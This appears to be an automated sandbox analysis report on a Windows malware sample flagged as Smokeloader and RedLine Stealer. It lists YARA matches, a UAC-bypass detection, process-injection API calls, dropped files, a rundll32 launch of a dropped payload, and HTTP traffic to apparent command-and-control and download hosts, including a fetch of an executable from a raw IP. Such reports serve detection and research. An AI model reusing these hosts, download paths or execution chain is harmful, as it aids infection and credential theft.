            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crimlvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: freeshmex.at
            Source: unknownDNS traffic detected: queries for: freeshmex.at
            Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
            Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
            Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49715 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: Yara matchFile source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: B87E.exe, 00000005.00000002.464864822.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3A08 CryptImportKey,

            System Summary

            barindex
            Source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F025
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004170DC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138E8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413E2C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C635
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414370
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040F025
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004170DC
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004138E8
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00413E2C
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040C635
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00414370
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004157C9
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F75ED
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004BC1BB
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F1220
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004A7641
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_00506760
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B3784
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F081F
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004D6A7B
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0049BC94
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401407 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013E3 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013F6 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013FE NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00401407 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013E3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013F6 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013FE NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
            Source: file.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: B87E.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: EBC4.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: gfgsrbs.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
            Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dll
            Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp 3D63AD175A34E4C89EA6ECA4A1161BB5DD514A5E58302707EDC03473EB1F656E
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\gfgsrbs C:\Users\user\AppData\Roaming\gfgsrbs
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B87E.exe C:\Users\user\AppData\Local\Temp\B87E.exe
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EBC4.exe C:\Users\user\AppData\Local\Temp\EBC4.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EBC4.exe "C:\Users\user\AppData\Local\Temp\EBC4.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B87E.exe C:\Users\user\AppData\Local\Temp\B87E.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EBC4.exe C:\Users\user\AppData\Local\Temp\EBC4.exe
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gfgsrbsJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B87E.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@9/5@35/10
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B8E86 CreateToolhelp32Snapshot,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeMutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: EBC4.exe, 00000007.00000002.489007839.0000000000410000.00000040.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000002.507739087.0000000000410000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\cine\zu.pdb source: EBC4.exe, 00000007.00000000.479192618.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000000.488527200.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: BC:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb` source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
